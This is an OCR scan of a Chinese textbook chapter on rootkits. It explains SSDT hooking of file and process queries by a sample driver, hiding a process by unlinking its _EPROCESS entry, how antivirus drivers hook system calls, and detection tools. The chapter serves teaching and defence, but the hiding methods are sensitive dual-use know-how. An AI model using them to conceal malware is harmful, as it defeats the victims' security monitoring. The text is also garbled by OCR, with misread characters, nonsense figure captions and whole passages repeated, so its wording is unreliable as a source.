(2) 实践 工具 : ExplorerSuite,procexp. exe. XueTr. exe, 


3. 名 词 解释 


(1) Rootkit ER: 一 种 “越权 执行 ”的 应 用 程序 , 它 设法 让 自己 达到 
和 系统 内 核 一 样 的 运行 级 别 , 甚 至 进入 内 核 空间 ,以 拥有 和 内 核 一 样 的 
访问 权限 。Rootkit 破坏 系统 自身 检测 的 完整 性 ,一 旦 部 署 ,难以 用 一 般 
手段 消灭 。 

(2) Bootkit 技术 : 是 更 高 级 的 Rootkit, 该 概念 最 早 于 2005 年 被 
eEye Digital 公司 在 他 们 的 Bootkit 项 目 中 提 及 ,该 项 目 通过 感染 MBR 
(磁盘 主 引 记录 ) 的 方式 ,实现 绕 过 内 核 检 查 和 启动 隐身 。 所 有 在 开机 时 
比 Windows 内 核 更 早 加 载 ,实现 内 核 劫持 的 技术 ,都 可 以 称 之 为 


Bootkit 。 
4. 预备 知识 


Rootkit 技术 出 现 于 20 世纪 90 年 代 初 ,在 1994 年 2 月 的 一 篇 安全 
咨询 报告 (CERT-CC CA-1994-01) 首 先 使 用 了 Rootkit 这 个 名 词 。 

Rootkit 技术 具有 两 种 工作 模式 , 即 用 户 模式 和 内 核 模式 , 皆 能 通过 
修改 现 有 操作 系统 的 软件 实现 进程 隐藏 .文件 隐藏 ,通信 和 隐藏. 抗 查 杀 以 
及 完全 控制 系统 等 功能 ,而 安全 检测 软件 很 难 发 现 系统 已 被 植 和 人 的 痕 
迹 。 因 此 Rootkit 作为 远程 控制 的 前 沿 技术 ,其 检测 技术 是 当前 研究 和 
应 用 的 热点 ,比较 著名 且 公 开 的 有 用 户 模 式 型 Hacker Defender #146 
子 等 ,内 核 模式 型 Agony Ring0 Rootkit、Ntrootkit 和 FU 等 。 与 应 用 模 
式 相 比 ,内 核 模式 Rootkit 的 功能 更 为 强大 ,而 且 它 能 逃避 任何 应 用 层 的 


检测 ,预防 和 检测 的 难度 更 大 。 

1) Rootkit 的 类 型 

至 少 有 五 种 类 型 的 Rootkit: 固件 (firmware)Rootkit 虚拟 化 Rootkit、 内 核 级 Rootkit, 
库 级 Rootkit, 应 用 程序 级 Rootkit 等 。 

(1) 固件 (firmware)Rootkit 。 

EF (firmware) rootkit 使 用 设备 或 平台 固件 来 创建 顽固 的 恶意 软件 镜像 。 这 种 
Rootkit 可 以 成 功 地 隐藏 在 固件 中 ,因为 人 们 通常 并 不 检查 固件 代码 的 完整 性 。 

(2) 虚拟 化 Rootkit, 

这 种 Rootkit 通过 修改 计算 机 的 启动 顺序 而 发 挥 作用 ,其 目的 是 加 载 自 己 而 不 是 原始 
的 操作 系统 。 一 旦 加 载 到 内 存 ,虚拟 化 Rootkit 就 会 将 原始 的 操作 系统 加 载 为 一 个 虚拟 机 ， 
这 就 使 得 Rootkit 能 够 截获 客户 操作 系统 所 发 出 的 所 有 硬件 请 求 ,如 Blue Pill, 

G) 内 核 级 Rootkit 。 

内 核 级 Rootkit 增加 了 额外 的 代码 ,并 能 够 蔡 换 一 个 操作 系统 的 部 分 功能 ,包括 内 核 和 
相关 的 设备 驱动 程序 。 现 在 的 操作 系统 大 多 并 没有 强化 内 核 和 驱动 程序 的 不 同 特性 。 这 
样 , 许 多 内 核 模 式 的 Rootkit 是 作为 设备 驱动 程序 而 开发 的 ,或 者 作为 可 加 载 模块 ,如 Linux 
中 的 可 加 载 模块 或 Windows 中 的 设备 驱动 程序 ,这 类 Rootkit 极其 危险 ,因为 它 可 获得 不 
受 限 制 的 安全 访问 权 。 如 果 代码 中 有 任何 一 点 错误 ,那么 内 核 级 别 的 任何 代码 操作 都 将 对 
整个 系统 的 稳定 性 产生 深远 的 影响 。 

内 核 级 的 Rootkit 极其 危险 ,因为 它 难 于 检测 。 其 原因 在 于 它 与 操作 系统 处 于 同一 级 
别 , 如 此 一 来 , 它 就 可 以 修改 或 破坏 由 其 他 软件 所 发 出 的 任何 请 求 。 这 种 情况 下 ,系统 自身 
不 再 值得 信任 ,一 种 可 接受 的 检测 方法 是 使 用 另外 一 个 可 信任 的 系统 及 其 安装 的 检测 软件 ， 
并 将 受 感染 的 系统 加 载 为 一 个 数据 源 进行 检测 。 

(4) 库 级 Rootkit 。 

库 级 Rootkit 可 以 用 隐藏 攻击 者 信息 的 方法 来 补丁 、 钧 住 ( 即 所 谓 的 hook) ,替换 系统 调 
用 。 从 理论 上 讲 , 这 种 Rootkit 可 以 通过 检查 代码 库 ( 在 Windows 平台 中 就 是 DLL, 即 动态 
链接 库 ) 的 改变 而 发 现 其 踪迹 。 事 实 上 ,与 一 些 应 用 程序 和 补丁 包 一 起 发 行 的 多 种 程序 库 都 
使 得 检测 这 种 Rootkit 相当 困难 。 

(5) 应 用 级 Rootkit 。 

应 用 级 Rootkit 可 以 通过 具有 特洛伊 木马 特征 的 伪装 代码 来 蔡 换 普通 的 应 用 程序 的 二 
进 制 代码 ,也 可 以 使 用 钧 子 、 补 丁 、 注 入 代码 或 其 他 方式 来 修改 现 有 应 用 程序 的 行为 。 

2) Rootkit 机 制 

图 15-1 示意 了 系统 查询 在 Rootkit 安装 前 后 的 变化 。 

图 15-1(a) 显 示 系 统 能 正确 地 返回 查询 结果 ,图 15-1(b) 显 示 Rootkit 安装 系统 的 两 个 
地 方 。 

(1) 安装 SSDT 和 ShadowSSDT 钧 子 函数 。 

图 15-2 所 示 为 拦截 系统 函数 的 调用 , 即 利 用 XueTr 工具 查看 SSDT 钩子 函数 。 

图 15-2 显示 了 驱动 HideDriver. sys 加 载 到 系统 内 核 中 ( 见 实践 操作 部 分 ) 拦 截 两 个 系 
统 函 数 的 调用 : NtQueryDirectoryFile 和 NtQuerySystemInformation 。 

© NtQueryDirectoryFile: 用 于 枚 举 文件 及 目录 ,每 当 在 资源 管理 器 (Explorer. exe) 中 
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恶意 软件 是 否 存在 ? 操作 查找 相关 文件 ? 恶意 软件 
函数 务 、 注册 
< m] Rf) 


(a) 正常 的 系统 查询 过 程 


之 恶意 软件 是 否 存在 ? > 


没有 发 现 


> 恶意 软件 是 否 存在 ? >| 操作 
系统 
< 没有 发 现 


(b) Rootkit 安 装 之 后 的 系统 查询 过 程 
图 15-1 系统 查询 


进程 “| 驱动 模块 | 内核 “内核 鬼子 | 应 用 层 鬼子 | 网 络 “| 注册 表 | 文件 | 启动 顺 | 服务 | 系统 杂项 | 电脑 体检 
IM | [pisk latoi | hevi | Sesi Dp ouiee 的 了 | 和 


SSDT oiin 


223 Quar Directoryfile OxA5E9B94C ssdt hook 0x844T2E9B 


D ATTE sys 
261 NtQuerySystenInformation DxASESCECO ssdt hook Ox8446EESE 


D: \bin\HideDriver. sys 


15-2 XueTr 工具 查看 SSDT 钩子 函数 


打开 文件 夹 时 ,都 会 调用 该 函数 ,该 函数 返回 当前 文件 夹 中 的 文件 和 子 文件 夹 并 显示 ， 
HideDriver. sys 用 自 定义 的 函数 Fake_NtQueryDirectoryFile 的 函数 地 址 值 0xA5E9B94C 


替换 SSDT 系统 表 中 的 NtQueryDirectoryFile 的 函数 地 址 值 0x84472E9B, 则 可 以 过 滤 返 回 
结果 。 具 体 调用 过 程 如 下 所 示 。 


Explorer. exe 操作 文件 夹 一 系统 查询 SSDT 表 中 对 应 的 函数 地 址 一 调用 
Fake_NtQueryDirectoryFile 习 调用 NtQueryDirectoryFile~> 返 回 结果 一 
Fake NtQueryDirectoryFile 过 滤 返 回 结果 一 返回 给 Explorer. exe 显示 


在 Fake_NtQueryDirectoryFile 函数 中 调用 原始 函数 完成 文件 及 目录 枚 举 的 实际 功能 ， 
查询 结果 又 回 到 伪装 函数 中 ,这 样 就 可 以 有 目的 地 过 滤 掉 隐藏 文件 或 目录 .。 


© NtQuerySystemInformation: 用 于 查询 系统 信息 ,依据 第 一 个 参数 SystemInforma- 
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(a) 正常 的 系统 查询 过 程 


之 恶意 软件 是 否 存在 ? > 


没有 发 现 


> 恶意 软件 是 否 存在 ? >| 操作 
系统 
< 没有 发 现 


(b) Rootkit 安 装 之 后 的 系统 查询 过 程 
图 15-1 系统 查询 


进程 “| 驱动 模块 | 内核 “内核 鬼子 | 应 用 层 鬼子 | 网 络 “| 注册 表 | 文件 | 启动 顺 | 服务 | 系统 杂项 | 电脑 体检 
IM | [pisk latoi | hevi | Sesi Dp ouiee 的 了 | 和 


SSDT oiin 


223 Quar Directoryfile OxA5E9B94C ssdt hook 0x844T2E9B 


D ATTE sys 
261 NtQuerySystenInformation DxASESCECO ssdt hook Ox8446EESE 


D: \bin\HideDriver. sys 


15-2 XueTr 工具 查看 SSDT 钩子 函数 


打开 文件 夹 时 ,都 会 调用 该 函数 ,该 函数 返回 当前 文件 夹 中 的 文件 和 子 文件 夹 并 显示 ， 
HideDriver. sys 用 自 定义 的 函数 Fake_NtQueryDirectoryFile 的 函数 地 址 值 0xA5E9B94C 


替换 SSDT 系统 表 中 的 NtQueryDirectoryFile 的 函数 地 址 值 0x84472E9B, 则 可 以 过 滤 返 回 
结果 。 具 体 调用 过 程 如 下 所 示 。 


Explorer. exe 操作 文件 夹 一 系统 查询 SSDT 表 中 对 应 的 函数 地 址 一 调用 
Fake_NtQueryDirectoryFile 习 调用 NtQueryDirectoryFile~> 返 回 结果 一 
Fake NtQueryDirectoryFile 过 滤 返 回 结果 一 返回 给 Explorer. exe 显示 


在 Fake_NtQueryDirectoryFile 函数 中 调用 原始 函数 完成 文件 及 目录 枚 举 的 实际 功能 ， 
查询 结果 又 回 到 伪装 函数 中 ,这 样 就 可 以 有 目的 地 过 滤 掉 隐藏 文件 或 目录 .。 


© NtQuerySystemInformation: 用 于 查询 系统 信息 ,依据 第 一 个 参数 SystemInforma- 


tionClass 的 取 值 探测 或 设置 多 种 系统 信息 (在 Windows 8 平台 下 可 探测 多 达 156 种 系统 信 
息 ) 。 这 里 的 参数 取 值 为 SystemProcessInformation 一 0x5, 用 于 查询 当前 所 有 运行 进程 的 
信息 ,返回 结果 。 

HideDriver. sys 用 自 定义 的 函数 Fake_NtQuerySystemInformation 的 函数 地 址 值 
0xA5E9C6C0 替换 SSDT 系统 表 中 的 NtQuerySystemInformation 的 函数 地 址 值 
0x8446EE5E。 具 体 过 程 如 下 。 


启动 任务 管理 器 一 系统 查询 SSDT 表 中 对 应 的 函数 地 址 一 调用 
Fake_NtQuerySystemInformation->i#jH] NtOuerySystemInformation~> 返 回 

结果 一 Fake_NtQuerySystemInformation 检查 是 否 是 5 号 调用 ,若是 则 过 滤 返 回 结果 一 返回 给 任务 
管理 器 显示 


Fake NtQuerySystemInformation 可 以 隐藏 特定 的 进程 。 通 过 这 种 方法 还 可 以 隐藏 注 
册 表 的 项 值 ` 网 络 连接 .端口 等 。 

(2) 修改 内 核对 象 结构 。 

安装 SSDT 和 ShadowSSDT 钧 子 函 数 比 较 容易 被 诸如 XueTr 之 内 的 工具 发 现 而 失效 ， 
Rootkit 驱动 程序 可 以 直接 修改 内 核对 象 而 达到 隐藏 的 目的 ,例如 NtQuerySystemInformation 
函数 查询 的 进程 信息 来 源 于 内 核对 象 _EPROCESS 结构 链表 ( 见 实践 11) ,修改 该 对 象 的 成 
员 变 量 值 或 将 某 一 进程 的 EPROCESS 从 双向 循环 链表 中 摘除 , 则 可 以 隐藏 特定 的 进程 , 即 
函数 返回 的 查询 结果 不 正确 或 不 完整 。 

对 于 SSDT 和 ShadowSSDT 钧 子 的 恢复 也 比较 容易 ,由 于 这 两 个 表 中 的 系统 函数 是 由 
系统 文件 ntkrnlpa. exe 和 win32. sys 导出 的 . 反 安 装 钩子 软件 首先 将 两 个 文件 读 入 内 存 , 计 
算出 它们 导出 系统 函数 在 内 存 的 实际 地 址 A, 与 SSDT 表 或 ShadowSSDT 表 中 的 对 应 函数 
B 地 址 进行 比较 ,如 果 不 一 样 则 用 A 替换 B 即 可 恢复 。 

内 核对 象 被 修改 的 情况 比较 复杂 ,例如 _EPROCESS 结构 链表 被 修改 ,可 以 欺骗 依赖 该 
对 象 信息 的 软件 ,如 任务 管理 器 等 ,但 进程 的 信息 不 仅 存 储 在 _EPROCESS 结构 中 ,还 存储 
在 其 他 内 核对 象 中 ,不 同 的 杀毒 软件 和 工具 软件 采用 不 同 的 系统 查询 策略 ,因此 被 隐藏 的 信 
息 仍 有 被 发 现 的 可 能 。 

Rootkit 木马 与 普通 的 特洛伊 木马 之 间 的 区 别 主 要 在 隐藏 方式 和 隐藏 功能 上 ,图 15-3 
所 示 为 Rootkit 木马 的 通用 模型 。 
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图 15-3 Rootkit 木马 通用 模型 
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Rootkit 木马 通用 模型 包含 两 个 部 分 : 

O 用 户 模式 部 分 : 联网 和 远程 通信 ,完成 木马 常见 的 功能 , 见 实践 10。 

@ 内 核 部 分 : 执行 隐藏 和 硬件 访问 ,目的 是 保护 运行 在 用 户 模式 的 木马 、Rootkit H 
录 文件 .进程 信息 ,注册 表 信 息 、 网 络 端口 使 用 信息 等 。 

3) 安全 保护 机 制 

SSDT 和 ShadowSSDT 钩子 的 使 用 比较 容易 也 比较 普遍 ,目前 的 Rootkit 木马 基本 上 
按 弃 了 这 种 方法 ,反而 是 绝 大 多 数 安全 软件 (如 入 侵 防 御 系统 (HIPS) 杀毒 软件 .系统 监控 、 
注册 表 监 控 软 件 等 ) 皆 通过 修改 SSDT 和 ShadowSSDT 表 的 函数 地 址 进行 HOOK ,从 而 实 
现 对 一 些 关 心 的 系统 动作 进行 过 滤 ,监控 的 目的 。 图 15-4 所 示 为 在 安装 了 捷克 Avast( 中 文 
名 为 爱 维 士 ) 安 全 软件 的 系统 中 运行 XueTr 工具 的 截图 。 
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15-4 AvastSSDT #J F 


Avast 的 驱动 aswSnx. sys 将 SSDT 表 中 的 大 部 分 系统 函数 进行 了 挂钩 ,还 有 少量 的 
ShadowSSDT 表 中 函数 ,这 样 用 户 态 的 操作 ( 读 、 写 和 执行 ) 都 会 被 Avast 拦截 并 审查 。 其 
他 杀毒 软件 如 QQ 保镖 (QQProtect. sys) .ESET(ehdrv. sys) 等 也 是 如 此 ,这 也 是 为 什么 一 
台 计 算 机 上 一 般 不 能 安装 两 种 或 两 种 以 上 的 杀毒 软件 的 关键 原因 之 一 , 即 “ 一 山 不 容 二 虎 ”。 
图 15-5 所 示 为 当 启 动 XueTr 工具 时 ,需要 加 载 驱动 XueTr. sys 进入 内 核 以 便 获 取 相 关系 
统 信息 ,360 安全 卫士 会 拦截 其 对 系统 函数 NtLoadDriver 的 调用 ,如 果 选 择 阻止 加 载 
XueTr. sys, 则 XueTr 工具 的 主 界面 显示 不 了 任何 信息 。360 的 内 核 钧 子 与 其 他 杀毒 软件 
不 同 , 具 体 分 析 见 实践 11. 

安全 软件 挂钩 系统 函数 的 保护 目的 ,SSDT 表 部 分 说 明 如 下 。 

(1) NtOpenProcess: 

用 于 进程 打开 其 他 进程 的 操作 。 在 自 定义 的 Fake_NtOpenProcess 函数 中 ,首先 获取 
要 打开 的 进程 PID, 判 断 该 PID 是 否 是 被 保护 的 进程 ,如 果 是 被 保护 的 进程 , 则 去 掉 打开 权 
限 中 的 相应 权限 ,去 掉 结束 进程 的 权限 ,最 终 再 调用 真实 的 NtOpenProcess 函数 ,使 恶意 程 
序 也 无 法 结束 目标 进程 。 

(2) NtDuplicateObject: 

用 于 从 其 他 进程 复制 一 个 句柄 到 当前 进程 ,而 且 csrss. exe 进程 会 保存 所 有 进程 的 句 
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(全 驱动 防护 


有 程序 正在 加 载 危 险 驱动 ， 建 议 立即 阻止 


驱动 程序 拥有 最 高 运行 权限 ,通常 用 于 驱动 硬件 ， 苦 通 软件 也 可 能 使 用 。j 载 示 知 
驱动 可 能 导致 系统 被 木马 入 侵 ,或 者 这 成 系统 不 稳定 . 


危险 要 动 [SS DAbin\XueTAXueTr.sys 


发 起 来 源 : DAbin\XueTr\XueTr.exe 
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图 15-5 360 拦截 系统 调用 


柄 ,通过 调用 DuplicateHandle 从 csrss 中 复制 句柄 ,可 以 间接 地 达到 调用 OpenProcess 获 
取 目 标 进程 句柄 的 目的 。 在 定义 的 Fake_NtDuplcateObject 函数 中 ,首先 调用 真实 的 
NtDuplicateObject, 如 果 调 用 成 功 ,判断 最 后 返回 的 句柄 是 不 是 受 保 护 进 程 的 句柄 ,如 果 是 
受 保 护 的 进程 句柄 , 则 关闭 它 。 通 过 这 样 的 过 滤 ,恶意 程序 无 法 通过 调用 DuplicateHandle 
来 打开 受 保护 的 进程 。 

(3) NtCreateThread: 

用 于 在 进程 中 和 其 他 进程 中 创建 线程 (分 别 调用 CreateThread 和 CreateRemoteThread)， 
通过 过 滤 NtCreateThread 可 以 防止 恶意 程序 调用 CreateRemoteThread 在 受 保护 的 进程 中 
创建 远程 线程 进行 线程 注入 。 

(4) NtOpenThread : 

用 于 获取 目标 线程 的 句柄 ,进一步 通过 此 句柄 操作 目标 线程 。 防 密码 窃取 系统 挂钩 了 
NtOpenThread 来 防止 恶意 程序 操作 受 保护 进程 的 线程 。 在 自 定义 的 Fake_NtOpenThread 
函数 中 ,首先 获取 线程 所 在 进程 的 PID, 然 后 判断 该 PID 是 否 被 保护 ,如 果 是 被 保护 的 PID， 
则 直接 返回 STATUS_ACCESS_DENIED ,否则 调用 真实 的 NtOpenThread。 

(5) NtWriteVirtual Memory: 

进程 可 以 调用 WriteProcessMemory 来 写 其 他 进程 内 存 , 通 过 挂 钧 NtWriteVirtualMemory 
来 防止 恶意 程序 写 受 保护 的 进程 内 存 , 如 线程 注入。 

ShadowSSDT 表 的 挂钩 常用 于 窗口 保护 、 安 全 输入 、 截 屏保 护 等 ,部 分 说 明 如 下 。 

(1) 窗口 保护 。 

恶意 程序 通过 获取 安全 软件 的 窗口 句柄 ,然后 通过 关闭 .隐藏 .禁用 等 手段 破坏 其 正常 
工作 ,需要 挂钩 表 ( 如 表 15-1 所 示 ) 中 的 函数 来 防止 恶意 程序 的 破坏 。 

(2) 安全 输入 。 

(Q) NtUserSendInput: 

恶意 程序 可 以 通过 调用 SendInput 来 模拟 按键 干扰 正常 输入 ,可 以 挂钩 NtUserSendInput 
防止 恶意 操作 。 当 用 户 正 在 输入 密码 等 隐私 信息 的 时 候 , 禁 止 其 他 程序 调用 SendInput 模 
拟 键盘 和 鼠标 操作 。 
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表 15-1 窗口 相关 函数 


用 户 态 API 内 核 态 API 功能 描述 
FindWindow NtUserFindWindowEx 查找 窗口 获取 句柄 
GetForegroundWindow NtUserGetForegroundWindow 得 到 当前 顶层 窗口 
EnumWindows NtUserBuildHwndList 枚 举 所 有 顶层 窗口 
GetWindowThreadProcessId NtUserQueryWindow 获取 句柄 对 应 的 进程 PID 
WindowFromPoint NtUserWindowFromPoint 获取 所 在 位 置 的 窗口 句柄 
SetParent NtUserSetParent 改变 某 个 子 窗口 的 父 窗 
PostMessage NtUserPostMessage 发 送 消 息 
SendMessage NtUserMessageCall 发 送 消 息 
SetWindowLong NtUserSetWindowLong 改变 窗口 属性 
ShowWindow NtUserShowWindow 改变 窗口 显示 状态 
DestroyWindow NtUserDestroyWindow 销毁 窗口 
EnableWindow NtUserCallHwndParamLock 禁用 、 启 用 窗口 


© NtUserGetAsyncKeyState: 

恶意 程序 可 能 不 停 地 调用 NtUserGetAsyncKeyState 来 获取 键盘 的 按键 状态 从 而 记录 
键盘 的 输入 信息 ,可 以 挂钩 NtUserGetAsyncKeyState 用 来 禁止 此 类 键盘 记录 行为 。 当 用 
户 正在 输入 密码 等 隐私 信息 的 时 候 ,禁止 其 他 程序 调用 NtUserGetAsyncKeyState, 但 是 不 
会 阻止 当前 受 保护 的 进程 调用 。 

@ NtUserOpenDesktop: 

通过 SetWindowsHookEx 设置 的 消息 钧 子 只 会 在 当前 桌面 上 的 窗口 有 效 , 因 此 可 以 建 
立 一 个 安全 桌面 ,用 于 运行 需要 严密 保护 的 进程 。 这 样 , 非 本 桌面 上 运行 的 程序 无 法 通过 消 
息 钧 子 的 方式 来 获取 需要 保护 进程 窗口 的 信息 ,达到 了 保护 目标 进程 窗口 的 目的 。360 保 
险 箱 和 金山 密 保 都 有 一 个 叫 安全 桌面 的 功能 。 

首先 调用 真实 的 NtUserOpenDesktop 函数 ,然后 获取 返回 句柄 的 桌面 名 字 , 如 果 此 桌 
面 名 字 跟 创建 的 安全 桌面 名 字 一 样 , 则 关闭 此 桌面 句柄 ,并 返回 一 个 NULL 值 ,否则 返回 真 
实 的 句柄 。 达 到 保护 安全 桌面 的 目的 ,真正 做 到 安全 桌面 不 可 渗透 。 

@ NtUserTranslateMessage: 

在 输入 密码 的 时 候 , 用 户 程 序 一 般 调 用 TranslateMessage 将 消息 转化 为 具体 的 按键 信 
息 ,利用 此 特点 ,可 以 构建 一 个 DirectInput 安全 输入 通道 , 即 尽 可 能 少 地 通过 Windows £ 
统 的 键盘 按键 传输 通道 ,此 通道 是 极度 危险 的 ,恶意 程序 可 以 在 任意 位 置 添加 HOOK 截获 
按键 信息 。 

对 NtUserTranslateMessage 的 挂 钧 用 于 修正 虚拟 键盘 输入 的 虚拟 按键 ,首先 需要 判断 
是 否 正在 输入 密码 ,虚拟 键盘 是 否 正在 运行 ,是 否 需 要 修正 按键 ,这 3 个 参数 都 是 运行 于 用 
户 态 的 控制 程序 传递 进来 给 驱动 的 。 然 后 判断 消息 是 否 是 键盘 按键 的 消息 ,如 果 是 , 则 进 一 
步 判 断 此 消息 是 否 对 应 虚假 按键 ,如 果 是 , 则 修正 为 真实 的 按键 。 虚 假 的 按键 和 真实 的 按键 
也 是 用 户 态 传递 给 驱动 的 。 整 个 输入 通道 完全 自己 构建 ,不 通过 Windows 系统 提供 的 任何 
通道 ,所 有 类 型 的 HOOK 都 无 法 在 此 期 间 截获 虚拟 键盘 输入 的 密码 。 
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表 15-1 窗口 相关 函数 


用 户 态 API 内 核 态 API 功能 描述 
FindWindow NtUserFindWindowEx 查找 窗口 获取 句柄 
GetForegroundWindow NtUserGetForegroundWindow 得 到 当前 顶层 窗口 
EnumWindows NtUserBuildHwndList 枚 举 所 有 顶层 窗口 
GetWindowThreadProcessId NtUserQueryWindow 获取 句柄 对 应 的 进程 PID 
WindowFromPoint NtUserWindowFromPoint 获取 所 在 位 置 的 窗口 句柄 
SetParent NtUserSetParent 改变 某 个 子 窗口 的 父 窗 
PostMessage NtUserPostMessage 发 送 消 息 
SendMessage NtUserMessageCall 发 送 消 息 
SetWindowLong NtUserSetWindowLong 改变 窗口 属性 
ShowWindow NtUserShowWindow 改变 窗口 显示 状态 
DestroyWindow NtUserDestroyWindow 销毁 窗口 
EnableWindow NtUserCallHwndParamLock 禁用 、 启 用 窗口 


© NtUserGetAsyncKeyState: 

恶意 程序 可 能 不 停 地 调用 NtUserGetAsyncKeyState 来 获取 键盘 的 按键 状态 从 而 记录 
键盘 的 输入 信息 ,可 以 挂钩 NtUserGetAsyncKeyState 用 来 禁止 此 类 键盘 记录 行为 。 当 用 
户 正在 输入 密码 等 隐私 信息 的 时 候 ,禁止 其 他 程序 调用 NtUserGetAsyncKeyState, 但 是 不 
会 阻止 当前 受 保护 的 进程 调用 。 

@ NtUserOpenDesktop: 

通过 SetWindowsHookEx 设置 的 消息 钧 子 只 会 在 当前 桌面 上 的 窗口 有 效 , 因 此 可 以 建 
立 一 个 安全 桌面 ,用 于 运行 需要 严密 保护 的 进程 。 这 样 , 非 本 桌面 上 运行 的 程序 无 法 通过 消 
息 钧 子 的 方式 来 获取 需要 保护 进程 窗口 的 信息 ,达到 了 保护 目标 进程 窗口 的 目的 。360 保 
险 箱 和 金山 密 保 都 有 一 个 叫 安全 桌面 的 功能 。 

首先 调用 真实 的 NtUserOpenDesktop 函数 ,然后 获取 返回 句柄 的 桌面 名 字 , 如 果 此 桌 
面 名 字 跟 创建 的 安全 桌面 名 字 一 样 , 则 关闭 此 桌面 句柄 ,并 返回 一 个 NULL 值 ,否则 返回 真 
实 的 句柄 。 达 到 保护 安全 桌面 的 目的 ,真正 做 到 安全 桌面 不 可 渗透 。 

@ NtUserTranslateMessage: 

在 输入 密码 的 时 候 , 用 户 程 序 一 般 调 用 TranslateMessage 将 消息 转化 为 具体 的 按键 信 
息 ,利用 此 特点 ,可 以 构建 一 个 DirectInput 安全 输入 通道 , 即 尽 可 能 少 地 通过 Windows £ 
统 的 键盘 按键 传输 通道 ,此 通道 是 极度 危险 的 ,恶意 程序 可 以 在 任意 位 置 添加 HOOK 截获 
按键 信息 。 

对 NtUserTranslateMessage 的 挂 钧 用 于 修正 虚拟 键盘 输入 的 虚拟 按键 ,首先 需要 判断 
是 否 正在 输入 密码 ,虚拟 键盘 是 否 正在 运行 ,是 否 需 要 修正 按键 ,这 3 个 参数 都 是 运行 于 用 
户 态 的 控制 程序 传递 进来 给 驱动 的 。 然 后 判断 消息 是 否 是 键盘 按键 的 消息 ,如 果 是 , 则 进 一 
步 判 断 此 消息 是 否 对 应 虚假 按键 ,如 果 是 , 则 修正 为 真实 的 按键 。 虚 假 的 按键 和 真实 的 按键 
也 是 用 户 态 传递 给 驱动 的 。 整 个 输入 通道 完全 自己 构建 ,不 通过 Windows 系统 提供 的 任何 
通道 ,所 有 类 型 的 HOOK 都 无 法 在 此 期 间 截获 虚拟 键盘 输入 的 密码 。 


(3) 截屏 保护 。 
很 多 截屏 类 的 键盘 记录 程序 , 当 用 户 在 虚拟 键盘 上 按 下 一 个 键 时 ,恶意 程序 就 截 一 次 屏 
幕 ,这 样 可 以 清楚 地 看 到 用 户 输入 的 密码 信息 。 挂 钩 两 个 函数 NtGdiBitBlt、 
NtGdiStretchBlt 可 以 用 于 防 截屏 。 卡 巴 斯 基 反 病 毒 软件 率先 推出 截屏 保护 , 即 当 虚拟 键盘 
运行 的 时 候 , 阻 止 程序 进行 截屏 操作 ,在 一 定 程 度 上 可 以 阻止 此 类 键盘 记录 工具 的 工作 。 
图 15-6 所 示 为 卡巴 斯 基 的 虚拟 键盘 。 
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15-6 卡巴 斯 基 虚 拟 键盘 


4) Rootkit 的 检测 

Rootkit 可 以 算 改 多 种 工具 和 其 他 所 有 程序 赖 以 运行 的 库 文件 ,因此 Rootkit 检测 的 基 
本 问题 是 ,如 果 当 前 系统 已 经 被 Rootkit 破坏 ,那么 它 就 不 再 值得 信任 。 具 体 而 言 , 管 理 员 
的 一 些 操 作 , 如 列 示 正 在 运行 的 程序 列表 、 列 示 一 个 文件 夹 内 的 所 有 文件 等 都 未 必 是 最 初 的 
设计 者 所 期 望 的 。 

检测 Rootkit 的 最 好 方法 是 关闭 被 怀疑 感染 Rootkit 的 计算 机 ,然后 用 另外 一 个 干净 的 
硬盘 或 其 他 媒体 启动 计算 机 ,再 用 相关 的 检测 软件 实施 检查 。 因 为 一 个 没有 运行 的 Rootkit 
是 无 法 隐藏 自己 的 。 比 较 常用 的 检测 工具 有 BlackLight、RootkitRevealer 和 Rootkitremover。 

(1) BlackLight: 

F-Secure BlackLight 的 Rootkit 清除 技术 可 以 检测 普通 用 户 和 安全 工具 无 法 找到 的 对 
象 ,并 向 用 户 提 供 一 个 清除 Rootkit 的 选择 。 此 工具 可 以 对 系统 进行 深度 检查 ,从 而 使 其 可 
以 检测 普通 安全 软件 无 法 清除 的 威胁 。 

(2) RootkitRevealer: 

RootkitRevealer 是 一 款 Rootkit 检测 工具 ,包括 在 微软 sysinternals 工具 集 里 面 ,从 网 
站 www. sysinternals. com 下 载 。 它 可 以 成 功 地 检测 www. rootkit. com 网 站 上 所 公布 的 所 
有 顽固 的 Rootkit。 一 些 恶意 软件 通过 使 用 其 可 执行 的 文件 名 而 开始 采取 相应 的 对 抗 手段 ， 
RootkitRevealer 从 一 个 随机 的 文件 副本 启动 扫描 。 

RooktkitRevealer 通过 对 上 层 Windows API 的 调用 结果 与 通过 对 底层 文件 系统 信息 
和 注册 表单 元 (Register hive, 一 个 hive 文件 是 注册 表 在 硬盘 上 实际 存储 的 格式 ) 查 询 的 结 
果 进 行 对 照 来 发 现 差异 ,这 种 差异 只 能 说 明 有 可 能 存在 Rootkit, 但 它 没有 什么 确定 的 方法 
告诉 使 用 者 怎样 决定 ,这 主要 依靠 的 是 输出 结果 和 用 户 的 知识 经验 。 如 果 用 户 认 为 确实 感 
YLT Rootkit, 就 可 以 上 网 搜索 清除 办 法 。 如 果 用 户 不 能 确定 如 何 清除 ,就 应 当 用 干净 的 媒 
体重 新 格式 化 系统 盘 , 并 重新 安装 系统 。 

(3) Rootkitremover: 


McAfee( 迈 克 菲 ) 杀 毒 软件 是 全 球 最 畅销 的 杀毒 软件 之 一 ,McAfee 的 Rootkit 清除 工 
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具 Rootkitremover 能 检测 复杂 的 Rootkit 及 相关 的 恶意 软件 ,包括 检测 和 清除 Zero Access 
(是 当今 世界 上 已 知 的 最 大 的 僵尸 网 络 之 一 )、Necurs、TDSS( 魔 影 ) 等 。McAfee 不 断 更 新 
该 工具 ,图 15-7 所 示 为 其 检测 的 画面 。 


NJ ENRNR 如 各 \ 信 息 安全 防护 \2012\tools\rootlitremover exe CEBE 


Rootkit Remover v@.8.9.174 [Jun 2 2014 - 14:10:001 
McAfee Labs. 


Windows build 6 x86 Service Pack 1 
[Checking for up 


Scanning for user-mode threats ... 


Scanning for kernel-mode thre. 
Si Result —)> No trojan or viruses found? 


图 15-7 Rootkitremover 检测 结果 


许多 反 病 毒 软件 和 恶意 软件 清除 工具 在 面 对 Rootkit 时 可 以 检测 出 来 ,但 清除 Rootkit 
时 可 能 是 无 能 为 力 的 ,这 是 因为 在 内 核 运行 的 Rootkit 驱动 很 难 印 载 ,强行 印 载 极 可 能 蓝屏 
如 实践 11。 一 般 清 除 Rootkit 的 流程 是 先 检测 ,如 有 发 现 则 尝试 清除 ,如 果 尝 试 失 败 则 用 
PE 启动 盘 ( 微 软 开 发 的 一 款 独 立 运行 的 “精简 的 Windows” 系 统 ), 可 用 U 盘 启 动 计算 机 ,而 
